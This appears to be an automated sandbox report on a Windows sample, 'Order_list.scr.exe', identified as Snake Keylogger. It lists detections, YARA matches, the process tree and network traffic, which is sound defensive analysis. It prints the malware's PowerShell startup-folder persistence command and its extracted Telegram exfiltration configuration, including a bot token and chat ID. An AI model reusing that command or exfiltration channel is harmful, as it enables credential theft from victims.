Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_list.scr.exe

Overview

General Information

Sample name:Order_list.scr.exe
Analysis ID:1589903
MD5:f614cd44a2ca0676523d3f9d23ae23b2
SHA1:c5656616f7095e6b19c995b2528c984234d8e3ed
SHA256:b37e686fd31a86e8ace7bac6a862b1388241527af590a168c294801cfbecd5b1
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Yara detected AntiVM3
Yara detected Snake Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops PE files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Order_list.scr.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Order_list.scr.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)
    • powershell.exe (PID: 7048 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Order_list.scr.exe (PID: 3584 cmdline: "C:\Users\user\Desktop\Order_list.scr.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)
  • svchost.exe (PID: 2896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • 00.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)
    • powershell.exe (PID: 6260 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 00.exe (PID: 6256 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ/sendMessage?chat_id=7222025033", "Token": "7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ", "Chat_id": "7222025033", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0x8a4:$x1: $%SMTPDV$
    • 0x84c:$x3: %FTPDV$
    • 0x870:$m2: Clipboard Logs ID
    • 0xaae:$m2: Screenshot Logs ID
    • 0xbbe:$m2: keystroke Logs ID
    • 0xe98:$m3: SnakePW
    • 0xa86:$m4: \SnakeKeylogger\
    00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x6b24:$a1: get_encryptedPassword
        • 0x6e10:$a2: get_encryptedUsername
        • 0x6930:$a3: get_timePasswordChanged
        • 0x6a2b:$a4: get_passwordField
        • 0x6b3a:$a5: set_encryptedPassword
        • 0x8247:$a7: get_logins
        • 0x81aa:$a10: KeyLoggerEventArgs
        • 0x7e15:$a11: KeyLoggerEventArgsEventHandler
        Click to see the 29 entries
        SourceRuleDescriptionAuthorStrings
        0.2.Order_list.scr.exe.3719840.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.Order_list.scr.exe.29590ec.1.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0xa20a4:$x1: In$J$ct0r
          • 0xa2de0:$a1: WriteProcessMemory
          • 0xa2e6c:$a1: WriteProcessMemory
          • 0xa2f40:$a4: VirtualAllocEx
          • 0xa3164:$a4: VirtualAllocEx
          • 0xa31e4:$a4: VirtualAllocEx
          0.2.Order_list.scr.exe.4d40000.5.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x490b9:$x1: In$J$ct0r
          5.2.00.exe.3a39840.3.raw.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            5.2.00.exe.3a39840.3.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x14ac4:$a1: get_encryptedPassword
            • 0x14db0:$a2: get_encryptedUsername
            • 0x148d0:$a3: get_timePasswordChanged
            • 0x149cb:$a4: get_passwordField
            • 0x14ada:$a5: set_encryptedPassword
            • 0x161e7:$a7: get_logins
            • 0x1614a:$a10: KeyLoggerEventArgs
            • 0x15db5:$a11: KeyLoggerEventArgsEventHandler
            Click to see the 21 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order_list.scr.exe", ParentImage: C:\Users\user\Desktop\Order_list.scr.exe, ParentProcessId: 6984, ParentProcessName: Order_list.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 7048, ProcessName: powershell.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order_list.scr.exe", ParentImage: C:\Users\user\Desktop\Order_list.scr.exe, ParentProcessId: 6984, ParentProcessName: Order_list.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 7048, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2896, ProcessName: svchost.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order_list.scr.exe", ParentImage: C:\Users\user\Desktop\Order_list.scr.exe, ParentProcessId: 6984, ParentProcessName: Order_list.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 7048, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T10:12:07.123853+010028033053Unknown Traffic192.168.2.449734104.21.64.1443TCP
            2025-01-13T10:12:08.548593+010028033053Unknown Traffic192.168.2.449737104.21.64.1443TCP
            2025-01-13T10:12:09.858094+010028033053Unknown Traffic192.168.2.449739104.21.64.1443TCP
            2025-01-13T10:12:12.501706+010028033053Unknown Traffic192.168.2.449745104.21.64.1443TCP
            2025-01-13T10:12:15.127412+010028033053Unknown Traffic192.168.2.449749104.21.64.1443TCP
            2025-01-13T10:12:20.906180+010028033053Unknown Traffic192.168.2.449754104.21.64.1443TCP
            2025-01-13T10:12:25.293521+010028033053Unknown Traffic192.168.2.449762104.21.64.1443TCP
            2025-01-13T10:12:29.316786+010028033053Unknown Traffic192.168.2.449768104.21.64.1443TCP
            2025-01-13T10:12:30.638274+010028033053Unknown Traffic192.168.2.449770104.21.64.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T10:12:05.613559+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
            2025-01-13T10:12:06.535491+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
            2025-01-13T10:12:07.973199+010028032742Potentially Bad Traffic192.168.2.449736132.226.247.7380TCP
            2025-01-13T10:12:19.285548+010028032742Potentially Bad Traffic192.168.2.449750132.226.247.7380TCP
            2025-01-13T10:12:20.316790+010028032742Potentially Bad Traffic192.168.2.449750132.226.247.7380TCP
            2025-01-13T10:12:21.660532+010028032742Potentially Bad Traffic192.168.2.449756132.226.247.7380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Order_list.scr.exeAvira: detected
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeAvira: detection malicious, Label: HEUR/AGEN.1309847
            Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ/sendMessage?chat_id=7222025033", "Token": "7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ", "Chat_id": "7222025033", "Version": "5.1"}
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeReversingLabs: Detection: 63%
            Source: Order_list.scr.exeReversingLabs: Detection: 63%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJoe Sandbox ML: detected
            Source: Order_list.scr.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Order_list.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49751 version: TLS 1.0
            Source: Order_list.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000000.00000002.4171576105.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, 00.exe, 00000005.00000002.4140969217.0000000002931000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 0167F1F6h3_2_0167F007
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 0167FB80h3_2_0167F007
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_0167E528
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA72FAh3_2_05DA7050
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA8945h3_2_05DA8608
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA5441h3_2_05DA5198
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA8459h3_2_05DA81B0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA8001h3_2_05DA7D58
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA0FF1h3_2_05DA0D48
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA7BA9h3_2_05DA7900
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA0B99h3_2_05DA08F0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA0741h3_2_05DA0498
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA7751h3_2_05DA74A8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA02E9h3_2_05DA0040
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA6E79h3_2_05DA6BD0
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_05DA33B8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_05DA33A8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA6A21h3_2_05DA6778
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA65C9h3_2_05DA6320
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA6171h3_2_05DA5EC8
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_05DA36CE
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA5D19h3_2_05DA5A70
            Source: C:\Users\user\Desktop\Order_list.scr.exeCode function: 4x nop then jmp 05DA58C1h3_2_05DA5618
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 009AF1F6h8_2_009AF018
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 009AFB80h8_2_009AF018
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_009AE528
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_009AEB5B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_009AED3C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06321A38h8_2_06321620
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 063202F1h8_2_06320040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06321471h8_2_063211C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632F8B9h8_2_0632F610
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06321A38h8_2_06321610
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632C8F1h8_2_0632C648
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632D1A1h8_2_0632CEF8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632DA51h8_2_0632D7A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632DEA9h8_2_0632DC00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632E759h8_2_0632E4B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06320751h8_2_063204A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632B791h8_2_0632B4E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06321011h8_2_06320D60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632F009h8_2_0632ED60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632C041h8_2_0632BD98
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632FD11h8_2_0632FA68
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632CD49h8_2_0632CAA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632D5F9h8_2_0632D350
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632E301h8_2_0632E058
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06320BB1h8_2_06320900
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632EBB1h8_2_0632E908
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06321A38h8_2_06321966
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632BBE9h8_2_0632B940
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632F461h8_2_0632F1B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 0632C499h8_2_0632C1F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06358945h8_2_06358608
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 063558C1h8_2_06355618
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06355D19h8_2_06355A70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06356171h8_2_06355EC8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 063565C9h8_2_06356320
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06356A21h8_2_06356778
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_063533B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_063533A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06356E79h8_2_06356BD0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 063572FAh8_2_06357050
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 063502E9h8_2_06350040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06357751h8_2_063574A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06350741h8_2_06350498
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06350B99h8_2_063508F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06357BA9h8_2_06357900
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06358001h8_2_06357D58
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06350FF1h8_2_06350D48
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06358459h8_2_063581B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 4x nop then jmp 06355441h8_2_06355198

            Networking

            barindex
            Source: Yara matchFile source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.4:61409 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
